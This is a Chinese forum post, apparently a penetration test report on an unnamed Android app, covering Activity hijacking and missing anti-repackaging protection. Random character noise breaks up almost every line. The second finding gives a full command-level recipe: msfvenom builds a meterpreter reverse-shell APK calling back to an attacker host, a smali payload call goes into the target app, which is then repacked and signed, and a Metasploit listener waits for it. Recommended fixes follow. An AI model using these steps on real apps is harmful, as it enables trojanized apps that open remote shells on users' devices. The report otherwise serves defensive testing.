- z5 C6 `0 H3 a) @, g7 ?6 \1 W3 ~ & l9 ]5 k9 `/ t/ ?- v' G$ _ 1-2 测试结果 ; u' T- Z* a* \- j/ n 8 z+ p* Y; n/ F( [

; C! A8 {5 s" ~4 f 2 `( }- a5 d7 k( I7 ?

0 o* {; b& F! n' A/ T5 x, b; e6 C3 d1 H1 F6 i' @   . C) s) u/ E6 f5 J- A6 d " y: N5 e! L+ u8 R, K7 u6 ~

3 ^; L6 l; Z+ D+ B; o& M, k5 H4 Z2 E: d

1 F- Y; r2 ~4 Q* s2 m9 l . w) ? V( t6 v+ v2 T) B 2 检测结果                    2 c+ j/ ]; s t 8 t% ~. H k, X% T+ j( T9 X- X

" [+ c. t R L, B% z+ J0 B' K! L" q+ {9 M

. z) y* A+ @- g9 }& b ) ?. A; E8 v! v0 I( I 2.1 某某某 ; c# t" s4 E6 u/ Q2 M; n7 G) K: u& ~$ @7 l5 X

5 c; `' @ h( T9 `2 f0 | & F) g1 |; X$ i( l f3 C

5 D/ h5 v$ O' m- w! G1 l& |: \ 7 A* L. i- }, U4 i* B" M2 v- z4 o# _ 2.1.1检测目标 , K& }2 m/ i) D) F4 [ % b+ Q/ m# l: A8 |: C

, \' {1 p- [0 u, I 6 v0 }5 p: @7 Y2 [

# h) Z, L' t* k+ p - [7 y/ w: V; m ~1 h* A. Z 目标地址: 某某某某某某APP 0 z: H* d" p1 R) ^ ; h4 U$ S) ?7 e! p0 d4 J

" h% V" j: R3 q8 _, v 7 `& g- C2 D8 t9 @9 `+ j7 o8 A

+ W2 R: A# b2 i- y+ x. ]& T3 L4 H4 g6 e L, Q 2.1.2检测结果 ' `* w5 a6 n5 H' j4 z 6 C3 G' i. M9 n9 S; ?3 G

^8 F9 B2 `; F0 j" n; F ; @8 i0 K& x7 E. _' u. M

; D' h0 w/ H+ e) E$ a$ A! e6 |, j I O0 g0 j 2.1.2.1 - @. I$ g" V+ |3 d* _5 g/ H4 d# U+ `( k7 m# J- o3 {" g2 T

/ c1 @ s& `0 X! s ' M& O5 q2 d8 ]

3 `2 C" \1 W$ h9 v ( e5 o: k6 X4 L$ _8 e 漏洞链接地址:某某某某某某APP 0 f1 A4 @; h9 R& r ) P- K- W5 h. a

6 p! {4 q, `2 Z: }) ]3 H3 J ) @) G* i( c6 X3 E. E

- O& b6 \; ?6 K* c% {. \# U' I/ h$ h8 M2 G; i) M4 i   8 H2 X- m$ Z/ m 6 {3 h" i6 C6 y$ d1 ]# ^

. |, d! n, I( f6 u P/ r' e * b0 w1 ^6 X: F6 o9 c" l& Q0 [

, ]& G. G2 _/ Q$ N 9 ?, d+ v, M9 t @( k9 q 漏洞分析及取证: 3 @9 G4 R9 k+ Y; Z6 Y0 ~ B" o) q . X: [% Z5 S, ~4 w0 ~& {. U

* \$ W% m8 |' t, S+ r) o6 r# l4 W/ _& V4 ]

9 e6 {( g- \( d 3 g8 ?3 r8 M7 v9 e6 ]: @7 b' p( \                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 3 g. \0 c% V" ^' G7 Y4 Y8 j/ o& l, E v# t- `

) k* D( j$ [7 Q7 B, O% S, }% g ( R3 Z% ~0 M: u& W- B; b

, w; ?6 f$ c& K, k+ Z * O8 h' Y) z+ b: J, J      6 {2 r7 n" |& q ( Q6 f6 B9 z/ @; S! L% O

- {, p1 q6 b- ^ , l2 R, ^5 I2 G

% d5 F/ Z( U3 {" O- x: C * c6 E" |7 Z. s3 \2 x9 N6 c; x                       " f3 j2 T( u) a, E/ ^# M2 H2 }+ f; b+ k* _8 Q

^ A, E, V# h d5 `, d" W 0 q$ w% |/ R; e) W

5 v+ v" p% O% |9 ~: l. n# Q2 Q: v& M2 r$ F% j5 C 6 A& I! Z/ S+ J e+ l 4 m2 E8 H% I1 `) h

0 i- @) X4 v2 d2 A& u D1 f 4 P/ q% }+ e# k

' a& N( Q8 G+ H* C; r 2 W" @3 l* z3 Z- d# R5 b+ X+ j $ p9 m0 u* e' ~; D/ s & Q8 f0 z! N' F3 o- h5 o9 P0 t

/ |+ y! [; R6 ^8 |0 \. j # }+ u7 q5 N- z% i5 S

, J6 f- H. p& p+ S# e! D & Y. R2 }: P; {! x' O1 i; _3 d 3 S: j- r$ h7 ~7 r" ^- C) o [& P ; f V) l) z% B) E+ s% K6 }: J$ q: e+ Q1 u

; I8 M" A, D1 Z0 ?2 S/ ~ P* K$ u! C* f2 N6 b' Q+ s9 w& o7 g

& `. s. H$ ~2 a. }' f! ^) Z& B. f$ \5 h# o' l$ n+ I8 S$ q 漏洞危害:高 * G) y* |$ Z# E& J2 a$ }9 l # g2 x, I4 v, S9 J! g

# s' ?# D# m/ P% x# j: i, ` * ]; t2 j5 ~% O( A8 z
& m O# e* R4 O7 w4 b' V1 `( L! j; f4 a8 ]/ ]$ m8 W 6 y( O$ S7 l+ \+ h) B2 x% N: p. h/ T& d7 K' K% B% ?2 M# ~4 K e2 [) K X# ]6 U- R v$ n8 C3 k, V4 R& o* v# x1 m0 ]6 c/ P# @ S9 g3 ]" S' Q0 _& X* m( a _8 T: P% _4 }' `& y) h# c8 i, C6 U& g7 D$ K- T" P0 v, q" p& g$ J6 E. L. t4 D. T- Z/ ~5 H1 }" S- n9 O% h) F% t- L. s% H+ a: X% K9 l( w- @- m2 c' `2 ^0 a4 N& X9 O. ^- i; Y! U8 N: B7 T; ]' q$ r8 _% S" l( u( @" |2 }) R8 b" H. `' O+ U4 l; M. W3 C, j3 l9 ~5 b L, I' X+ x6 F& I. G: A, n7 h; w1 Z* G# y: [( g3 i1 l1 I. U4 O2 H8 F" E# b$ _ H- t9 j5 z8 R# N' D9 ~! N& ]6 ]4 H, l/ @2 \7 M4 f/ j, L U _- I8 \* I: b& J+ i( S, W3 J# q1 j9 F1 ]% F, k
- r. Z9 g9 n( j3 | h" _: i4 V0 ^& D: T, C9 v* L5 c

' L* q/ d1 J; f' U: \2 [9 T( Q 3 x+ _2 k) L5 ] 严重程度 $ {8 u! s- f' L! c( o. C 7 V5 o. O( N- P( W4 m8 z, q! {

7 i, b% W( G' B& e0 W+ |) t% M $ y' L- M) P; t, @: x
# `* a! u3 O& ? r8 f, i# K 7 f1 p6 f4 [8 b! c9 c

$ m& a* H& \6 v! @( M : g( S9 Q5 A& L; |3 ~ / X1 G% m8 n2 j ; r9 K9 _8 k- _; H1 E5 T8 V

5 x. e) I1 o* G3 }( g. T) } ; D7 ~; \1 }9 I" N- \- {
1 W2 C; s' T3 E5 X2 U" V; P 2 `) m3 o; t, H E/ n/ a$ M7 R Z

2 O) H6 i l3 ~% J: \5 i: v- s / ]1 n7 B( F% C 6 F1 w" `% { g% j: G * h$ A# v/ X1 ?% B* j# M8 s

4 C9 V+ u) W4 V( B) W , K: y/ v ~5 u/ ~, |) S- E% I# g/ L
+ \ _# V# K5 R% M- R, W" y9 y3 r: C: |% c s8 C6 H' Q" L

5 P- R% I+ x. c3 F1 U2 D3 @; T. L+ `. s0 Y# F 3 Q/ z" s3 X. Q. G- ^1 L8 h/ e4 P4 b) L* {5 ]3 R

- r: X4 E5 G1 v- i / a( U4 N- H& w* D! a* H1 `3 O+ C
! f& n; L9 g9 D" R% r& f; { . Z5 h6 i3 j# K3 m, h

8 b; V7 h R6 T" a8 ~5 l9 X! ?; M5 B* ^# {3 N   1 [. n2 g6 D% P8 v, a$ q: c) h! } Z; o- _% ?/ p: L F

7 x/ e7 |0 t5 ^" b ! N7 C. h5 @& ~9 f
/ W8 ~* Q5 e- G( a d 9 f0 | E% k- k# p( b: @

1 P( b! y( o( m! y5 J+ e. [ + e$ s8 R1 z7 [$ v: w3 J / k7 |5 e% Q" T6 _! K; i4 t9 R; g, S

9 E7 K: O1 ^$ _% V5 P7 K 7 S' O" G' p3 I- j9 D. ~5 w5 }
# P$ Z% H. \0 ]$ R. i ! m, f1 X# V& Y3 N) y

7 L3 \ n# H- J8 | , n: A0 c7 h5 b! W4 \8 l   , C4 b$ k# b& y. R ' Q7 a5 b+ x& b/ `9 D

5 \! L9 l0 z s; ~; ]( I! ^ G- Q% x' @- `; F* ?; ~) ]# r
, r, b! h9 h; U$ m % D' h' J: N: B; r+ d' `
! U& i& K/ `( E' b7 _ 2 h" E- B- c: F

8 _/ K& y$ L) o' L" G; V& P4 M+ X* e | # W x. t* O9 ?, l   / j2 e! O! f1 P! r # D ?/ i1 ]4 s+ N& @% d

1 o# R3 M2 M$ [+ _ . v. ]3 N, C* |& ?0 B

7 g6 u. Z) m$ F9 \* m1 N3 U3 x " W8 a( ?& r/ Z; {5 u' f 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 5 M# X+ Z0 H/ C' J6 `$ c y- R- a5 Z2 P1 \7 W% O9 H

- U3 X9 K# F, W3 ~# P % N3 m4 g- _; U% V& z( _4 A4 \4 E: s

4 ], d. s y0 I/ \' E $ s- E) r' [ ]- u9 w           ! U: Z3 a6 ^ ~5 g2 C3 K0 ^, ^ . o, X$ n+ f" v1 U4 C& J

6 u6 D# W1 h; [- u5 i! v [( |5 V: g+ h9 @ }. `/ f

6 l7 r! T# }7 } N2 ? 9 D- K. M3 C1 x1 T1 W9 E: f   ( w o$ b* W, X. g4 P ; d! Y- Z( f% {9 |

- j3 Z) Y$ l) o7 \ o 7 |* z2 k7 v4 ^% [( v

: a: J. i( D+ B7 q . J. m* _& ?6 F$ x+ \, }# E2 o/ z 2.1.2.2 3 ]: V0 |0 Y: F; {6 z: X 0 W) a, t( r" o2 g0 Y4 x1 g

3 y' C: }& B$ P8 d: Q; R / R) b! I- g% T4 X. u

0 I; l% \+ n; A2 Q4 x2 i" B$ X, H + W* s; q" Q9 ` 漏洞链接地址:某某某某某某APP . ?/ y' [- u7 N0 }2 a) Y- i0 A . g- Y$ n5 T; Y( I

0 ] {- j0 F) D- ^; T- r& R9 J" m; j- g) h7 E0 F' _# i4 q

& v, D! c( Q7 r* N! e( |8 E 1 o! ~5 w, r( ]) Z/ f 漏洞分析及取证: 0 c X2 ^/ _# L6 q$ { * o0 N9 v+ z1 T9 S3 v( ~

- _' S- h; M* Y7 C8 D6 Z 6 a5 j: O7 G2 n. Z

1 M B# a- }. k+ ^# \7 f4 K1 r6 c7 y! A                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ; G. Z# m: \" M) l) y 0 s# {& P( @" p

5 s' J! s5 M, X9 T9 C5 d# y: q9 F 3 ~8 c" P: @1 C+ Q

, L' |) A8 ` F( M( I5 y 2 M9 L0 T F, \ Metasploit 生成木马 apk % T, b/ b8 }- T2 q6 }% l! p % X8 d, \! o$ a6 b1 J; ]

8 [. D6 P* |1 ?& Y/ e# z( [& V - ]! j, z# u0 L

( Y* a3 h8 i e5 g: E) w) \9 Q; I" [. N msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * f6 M, \3 S; t8 F! J2 q + [1 d: @: e" S' \2 x( x

2 M5 H6 Q% ~1 ~ , _3 R \, l) `3 d* k

k& x/ S0 ]8 |9 H5 j6 L6 }) f 0 D8 Y' [, `# D5 _ 反编译目标apk和木马apk ' o+ g; \0 e- Y) F" A 5 W0 c3 p7 M* S

* Q3 q5 N# Q2 p) o z+ p 6 S; C4 Z0 m! ?; I: {( o2 Y+ d" T6 u2 B

1 d0 m0 a- L' A+ s- _) q+ ` , K1 h @$ g! K6 b apktool d target.apk
: g# O4 I6 K3 p5 A( j+ q 3 K* N, h1 u$ H5 m: I+ }2 } apktool d cockhorse.apk
# k: {1 c/ U- a0 }. I. S) B/ ` $ `8 w; Y2 N" q V& D9 X

$ g: ~+ i) [) F9 O- Z+ i4 S# p / h2 i5 ]9 G3 b" c( T# |4 u

8 |7 f1 o ]: [% @5 `# C4 \! T" s/ c3 T. M- i0 G; ? 木马 apk 注入目标 apk + t7 ?3 W* S' k t9 \! x ) m4 |* R2 v3 Z8 [7 z

; M" v4 ?' c* x7 O1 I ( H" z+ h( I" g' ^2 i2 Y/ `

8 }% Z4 x; n6 @1 |& r3 f! Z # {4 k3 t2 I0 ]" A 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 x2 r& @0 z& Z. a# u " W' r1 h- p }( ?/ N# b# k2 c9 ] invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
$ U: i3 E" J7 B z) l7 ^* |/ }1 D( Q# a/ O! q5 d* D7 _

7 ~& W/ N! |. e6 \ 6 g$ W3 h5 i$ N$ l/ Z4 K

* V* c1 a* v# s 2 Q" Z$ s# p! f% u! D X f 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 - `8 l. z( T3 r9 H$ x" R : F: d' k$ R* g5 b( A

" E; f5 @6 }% A; Q+ W# g 3 z( H5 O; r, R' X( m

: m6 G% ?/ X' M0 |/ r1 M( d6 X9 W T! ~ 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ; b) y0 m1 M! V8 k: ?% i8 n* \7 X Y" E! U; T3 u* h

8 D% r+ @4 C3 t( z6 b1 e+ X$ G - V" s: q( ~9 n/ z

+ \: t5 u1 J" [! F1 D" [" U % ^/ Z r$ U7 g. V; c. ?& m# ^3 { y 回编译生成最终 apk : [* N u6 @% z8 U" N6 ^$ l6 {0 Z 1 y5 z) p5 w/ f( o0 x' f

, b, ?4 x- Q( _2 S8 J, F7 x% E2 ]" i9 c4 ^! I1 J3 u

5 ?5 j# l, [" X! ?1 `# _- {$ C: y' Y P: f) z+ H3 k# q4 b; K, B 重新打包 ) N' W& Q( C. x 1 d z: _: G, M8 ]8 d! X

( I5 d4 m, D j3 L* P0 E7 A " B" [9 R" {$ R v

' u# B- s! j0 m0 |/ [+ f 5 V. U [ B* N1 U apktool b -o repackage.apk target_app_floder 2 J8 F3 g8 W4 O0 e2 b1 ]) e2 C + G5 v6 B. X% |

3 b: }# I9 r% ?9 G7 m# p$ a& a9 p% E# B1 z j( A

) ~! c3 m6 w2 Z6 N8 z) l# j0 { 6 \8 S" E2 T6 s/ Q 创建签名文件,有的话可忽略此步骤 5 y0 r" s: `5 ~- {' @8 a, I9 \6 U8 k

, s" B, c+ P) t! e" u1 w 6 [8 N9 q& }# }9 {5 Q2 v: N

; N1 d: X1 T. j- G # w' S6 p# J3 ?/ C; k% Z keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                5 A/ D2 n, e0 X3 U! L4 B! {9 B; ?2 A1 Q. f; \5 @3 `% \7 y

( r! U+ u: e8 o3 ^ 4 E9 c7 F$ D4 M# b; f% k

5 ]1 f5 T A/ V9 A ' P$ j% z; x1 N0 @' I; |+ { 签名,以下任选其一 - [% _, M% H: y* c/ r8 R# t; D+ E6 I% e3 u8 N

4 F. D, o: |& R1 |7 Q. ^: n / e" I" p0 f7 ~5 @3 c

5 l9 j8 z) l3 e5 p' U+ w/ {$ u/ ^- ^% ? 6 o3 O# @' d7 B9 ^ jarsigner 方式 3 @ G, M# X, U/ l3 q: s: U: c : N i) g; C. \: Y

# R" n, g1 L3 Z" i ! b) n1 Y% I8 G

1 i, Q- {5 j+ ^8 u+ | . [- U; n% P3 q, T jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 N9 I: X5 E4 k- x. d5 D; P+ H6 s4 h 2 O/ G& R2 `! l" j4 w1 ^3 J/ @

! a9 z1 S8 t0 ]# h6 { & O0 C/ G2 X: ~

" R$ s+ r5 F6 A4 j5 e8 X( G( d; i( j1 x. c9 N% @ apksigner 方式 , d6 r1 S, g* S $ r# b5 }$ Q y$ R% n

- M2 M9 m9 w4 F+ W# P3 D% x ' W7 T1 r& g, G5 a

6 y% u$ \7 b$ X& }- B6 q. e3 [; y1 j" \ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 X$ \4 o/ y8 E3 ?' g* K; _4 j+ p; c8 H : ~. s; e' N6 I3 e( N& [2 f

6 D* a; S) G, f L; @: Y ) g8 B A; p: X

$ N6 H% c( _) v7 j9 \ " A( }" C; c- k" K) V, E 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! @4 |, U3 A& K" ~, \1 T% t0 r6 e2 }) g

! O. R6 R3 o* `) V& e1 a2 x ) \9 P' c' g) k/ d2 [

+ a S' B0 {% o8 P; { 5 a6 |1 u; J6 n5 i( o4 | 验证,以下任选其一 ( B" T4 F3 A5 d. M. K2 ?5 i$ e. c" r6 T; y( J

7 f: Q, j$ @2 N" r+ l2 u; \! M9 r + I5 k# a# o. t; L

! n9 r1 T$ ]/ ?4 ?2 r( V/ d, s) i # N- J* A- u: D% {0 R" ]; c1 ^ jarsigner方式 + J2 h7 L. B$ g# d" L* ?/ E( w, p / Q- r* x4 ~7 u7 t( p- P

V- s2 C: }' z: H% f: j W6 ^* W' y% |- h0 v

5 G. I5 V, N& C" T4 u$ }; n, {: P/ }+ g9 R jarsigner -verify repackaged.apk 3 Q2 x7 b# q0 b8 N' p' _ 9 R8 _3 f' j2 \1 e% g4 n5 n4 @

$ S$ c2 F( D; ?4 |! ] : a! e# ^9 d; ]4 l( U9 Z

0 T+ Y1 b( G g) b8 B& n' H/ z 0 j+ f0 G% p7 V6 L apksigner 方式 & X; t( g8 _7 M& N6 N / q) W, O& j; @5 E

# t; C8 o$ J Z$ n2 ]) t6 ~/ Y$ x ! }3 l: b) [+ e( D

/ j8 X9 _9 K. W3 _ ' U/ ~' Z5 g3 P apksigner verify -v --print-certs repackaged.apk " S/ V7 Z5 _' ?/ f4 J4 E+ D/ o, a+ c; }4 ~' V5 p

+ z! [% @0 ?8 h* g0 i7 H% ]1 y6 p5 X3 g& Y8 y" }3 s

. l9 U& D5 z3 z' O & Y7 ]/ Z' w- Y! I( C keytool方式 / D" t9 e5 u" e2 ^' ]( z; C9 h 7 v6 ]' \( f0 m% ~- y* q& T$ N

' T, b9 z) F3 A" c( E : j3 P& ~* ?# |, ~4 s6 J, z

" N9 v2 R9 ?5 w4 R* f) ]1 U& n- K' M1 z1 T5 k keytool -printcert -jarfile repackaged.apk ( a6 ]4 ?, k' a+ F4 R- n5 C1 [2 w1 x8 W9 i

8 X4 w$ y" i* ] ; }" d" Y- W4 w( ?& d% ^. E. A

1 Q- k/ l1 e, b" e# i0 I. E2 B) p % o# N, Z7 J" V2 w# P0 Q 对齐 ' y: k0 ^7 ~ y' v4 v, l( W& j; \! R; j+ p1 U5 w8 b4 a/ n

( P Z4 M; C- _) ^. R! t( u. M" W/ B* z( X' k# N# }5 u

: j. ?+ q c |" ]: q 3 H1 K0 U: M) f/ r6 n 字节对齐优化 . W! X7 i! N) V2 m% Z# I* J r$ B : _ r9 V' z7 c9 ^* ?

y$ R2 t* N j; b$ q" L+ p ?% ^+ u3 k5 g7 i0 G8 e' M: E7 B5 e2 v

/ Q3 y6 A& x3 P, n! n2 e& S$ \# a( h1 n7 B P: N2 R9 N zipalign -v 4 repackaged.apk final.apk 3 C! o- u( W) Q * `, a1 R2 e8 h2 u; Y

( p$ N( E, F w: D6 R5 B 5 M# K! d$ x) R* e

; [4 T7 f& l( X- l! _% O+ V7 h7 f2 x' }3 _. C; s& y$ K 检查是否对齐 4 S- v/ r4 |1 a) ]' f K, r! j7 m% C5 [% I7 J6 @+ N3 K$ [

3 e7 {3 {! ^, A9 _ 0 m6 |3 ~9 a7 j* [0 p

6 _$ X8 e1 f |9 ]' q! y7 [ 0 r9 ^. _, Z/ I/ x% } zipalign -c -v 4 final.apk / r2 V( r/ J! c* {5 d . m) }9 n4 c3 P6 |0 H5 u

3 @9 [: ]$ Z( P& c5 a7 W6 }; D/ i% Y' q/ O( a) e# g

- w9 t! B2 j, e; G& e- i+ H2 D! j* e 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 / h8 Y' b) m( e4 K& ], ` 2 H" @: D! G3 ~- e% \+ D0 K

* ~# c) a8 C6 s& I 6 j# U6 I% J8 \" S) X

9 B/ q' I( c& Z# _ v4 D8 Y' U% f4 _: ~- a/ A 启动Metasploit控制台,配置参数等待上线 4 X0 c, H# X/ a2 b 1 Y; |2 ?/ Z% H, R/ I0 n" l

3 p- S/ t" C2 W* D7 X/ l) s+ I/ E* Z/ K+ O

3 {8 L; ~8 i/ G+ l! I$ ]! M 6 t6 V' G: X9 ]5 `& B 在终端依次输入如下命令 * a/ M( i2 Q, N1 B# r ( a9 L( S3 A, U6 G

3 L( F, o, Y1 V8 S4 z6 n; | 2 E; H1 |% j0 ?; c, d

# J! o# q( p1 V 0 I; D1 ~% o# M) k msfconsole % \4 T) K) Z- i" t * Q5 \ e. [1 u2 i; ?" c

* m; K, ]2 v( L7 v+ N# G 4 g. p3 G- @$ ?2 |6 t+ d

" ` h. u; I: ]: H) d2 `; c" L6 q, g* ~; f6 k- O' W4 r# x use exploit/multi/handler ! {' }! `/ `4 ?0 t2 L2 N+ D, o9 s2 N5 e; Y

: S8 g- u' P. ?) q1 o 4 n7 N7 n, o( V2 g' C' Y

+ g+ m. {$ O* a: V" @, l$ N + C- O: f' W/ u" J- ~" j set PAYLOAD android/meterpreter/reverse_tcp 5 ]! z! A; e" m5 Q% D' [/ ^/ {

% i2 p: N0 i/ n+ l8 ^/ x1 U- p2 n) {4 V6 v2 r0 o g

2 c4 n4 [* i, w2 O& q$ }; y : N( ^% W1 z. c5 K8 g2 ^9 k set LHOST 192.xxx.xx.xx ! h0 l8 F# b" Z) _( ? " a: g% d4 T* z

! T: C# J" F9 D # q% q( |0 Y% M7 y; G# z6 O

0 @. ~4 n" |8 Q6 T+ w1 x# j3 _9 B, k - c% ^2 x# T0 A \6 R set LPORT 4444 0 ]- h: L9 M# {- t) C5 W' S& p; f: K% p z

6 L3 o- p% ?" u& C ' ^2 z8 C, ?8 S0 F% Z

# d, T$ k5 m9 m L: m; d+ D, ~ 4 J* h4 C5 G+ S9 L exploit 3 X4 J2 M" a2 ~; ^( P & `# L8 |2 z& o$ C: D1 d, H

, D, l2 b$ j- u0 m% q) B ; Q+ d, x* h0 j! N; h9 u. h

. a, n4 k( \: ~ `4 }2 P6 ~0 G j' K a: O 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               3 t( ~- u7 K3 u9 X8 a # ~- J8 g' k9 x5 d3 l

% [" x0 Z+ u9 U2 A/ D) N % N" V. D- a0 K* w6 H

; T; c2 B: n+ E0 W" k0 E. R , Z1 M6 x$ `2 [ 漏洞危害:中 ! @& d7 q% b* S2 n5 r9 o " C+ H {6 n6 C6 Z

8 P+ R9 Z n4 \8 @4 e$ ] S : k) ~7 F! R0 w+ Z* e
4 W1 {: N+ I; G! J$ q2 L; y " X/ R4 @5 |/ |8 k, | : z$ J2 [- I! f $ p1 W$ i3 z2 O# S 1 N* A/ x3 X) d1 [+ a0 v) I2 N; Q& w' a* j$ ], } y; j/ l, J! J# [- K+ X: _- M! F K8 ]" G) y) Q3 j, k. z3 F3 P, x2 E! }& k0 ?& Z0 U* c/ q5 j! I6 ]; A! N6 N6 q4 U$ X8 P& N- a9 t7 v7 [4 W5 \) r8 L, B' m. [! i3 W8 i9 z( \* Y, f6 W9 y! ]- {& N) h9 V" S3 |* p/ c6 ^) X2 Q+ e* T5 p& J5 s' ^; y5 G# T6 e) D/ h9 g4 K. d6 w/ @3 B* T* n- q( l9 a5 ^! s% f# }0 _2 i% f# V8 \* R! V! ?, Y7 W4 G1 i! `$ ^, D0 e8 t2 T* Q4 W* D) p# k+ @5 [& |5 E4 B/ A; z/ H( h# E4 [) d2 B1 E5 B3 K$ v- C1 L, K& ]- j; V. x; _6 V* M* B; W1 i0 X5 q) l: A! h1 I! m# E) y2 r5 ^
# `8 h5 s7 P8 j( m, w , M. m: Q- _" B' P4 ?

2 c& ?& [3 E; p9 ~6 p # C- |& x$ u3 S 严重程度 3 ?' X6 V9 X8 q# H . [* q9 s! F) u0 k ]6 l/ x

- d. `) R% \0 m: D* f3 ^5 H / i* x, o! ?2 N- Z5 ^" b
( N6 e# _5 Z$ u* E& e- Q ( `+ F6 b m0 H0 [" X

m+ v$ Q, v9 ]! [( v: R* k. p$ N; c0 s6 Z5 b " `' z( K$ p' |) B7 J) }4 }/ j n1 P4 B7 e/ c' U1 k9 F# l

0 v6 ?9 I& ^ T" b; D" { 0 E Q/ t9 v8 T6 L, F6 t0 k! O
/ A" Q4 a- b; l $ z7 G. C; E- u- Z7 F0 C

' D) l) `- }/ b4 O. C - R6 f/ V$ @" s! I & k7 Q* g# _! K3 a3 d+ ^3 R1 L& t6 W4 b+ f5 I

- f& {) I/ Q6 S7 l! r3 z- g ) s8 q3 P# L& d7 i
) S( v7 O+ W+ c5 c( r3 o 6 q( F, p; @7 a D @; y

7 E( _2 E/ @ ~ & j! Q4 p' @0 I" U " l6 R# a( G7 H2 q 8 M" Y* v! F4 ?! s& j

: `: b2 N I1 X- {6 b3 X + `8 v- W9 w$ D: J% A: B
3 {0 V3 O( A8 I( i4 R $ ?/ r6 y8 _6 j) G' ^ 3 z2 r# S2 v7 D9 X! I% C' ^$ x1 T7 O4 S1 a

! Z0 ]' c/ c6 X D ! ?9 D, v; M( b) U& b   0 K. C' P% I2 M9 d- y * w6 y# @4 T# ~ d- E+ s2 \

: L7 G$ y5 K! c- u3 ~. G+ s/ v ; k# p. e# L; I
: R+ J2 k) G- D E* d$ v) m2 d% @3 u9 M K4 N5 }/ M$ L! ]

2 S: S, \4 ]" T 7 m* W% u: l3 ?& K 5 h5 C2 t4 e& N( X" D ( |+ W4 }7 u/ C

8 V6 o B, E, _' o7 @. K9 X' q$ P& {
2 z2 |0 i4 L% ^5 l 6 V6 R( Z* A! X P# a. M- g 8 B* L: ^4 ^5 o; Z3 P8 a L8 }# `5 t+ v1 E D+ b/ {

! j3 m; W! a5 ?2 ?4 i, {* f " l7 {6 A& [5 K& E   & h; w# a* ?5 f0 c! H , u. x/ ^# {0 Q3 Z3 E# U- Q* q( ~

+ p4 Q, X# F" V" D1 N7 X+ z( f8 ?; H
3 V5 x" r# A; d0 [0 s: u3 |2 \7 e8 j9 C: O. H
! T$ Z [3 @( \0 L# d( u5 q1 t2 X/ j; K

Q A9 {6 n0 l+ _! k- d , |; ~$ `7 l7 G& @$ h( O   R, ~6 z1 x7 R" O, L' o/ ` 5 z% K6 L' }, h9 u6 s

/ r! g. u7 Q' d8 O, P, B & m G, Z7 v) C9 {+ H% z

: K$ Q8 k" T- ]$ j) V" L* k. q7 @$ O, I- M) F 修复方法: / S6 x; i0 G4 J& w* R% D 0 U; T3 K& u5 j7 l3 u

/ N4 e! c+ `: h8 ]2 {4 a8 s/ g, v4 H. K/ [; k6 f: i

0 r M$ m. K3 i/ @ & m& `. G; E& j$ V& L               1. APP 启动时应做签名校验防止二次打包。
4 U7 z w/ \* G; ^ 8 {$ \& m5 B- G; q 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 M+ \; P- c# j6 X9 |) Z- w W + O5 Z3 r1 U' F

! E3 E% {- m/ a. W + Z' ~4 ~) c. ]1 ~ 8 n& Z9 j- |* Q+ S2 l2 m2 T3 G & L4 O+ w9 X0 N& c+ T7 W& b. D

U' j7 @' b2 [) D 7 u8 a$ J, V& @   & y% \ C. F" {+ `& Z/ T 3 k! o5 |% D. C" J+ Y

1 ~! l' X( S6 }( j& Y 6 [# g: w) b# X. \# p) p 9 X% l0 t# g& L; D" I) m* R i& y, X. o+ g6 E1 Y- l3 V# L

1 i. f X+ }$ W: o% _6 z1 T6 `( e) y3 _1 [5 M" X0 v' a* @
+ ?& F. P# S4 f9 Q 7 M% O' _' L# h. X

9 b& K, P5 T d( E* {1 T3 U( |8 G ' {5 N; c0 X9 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表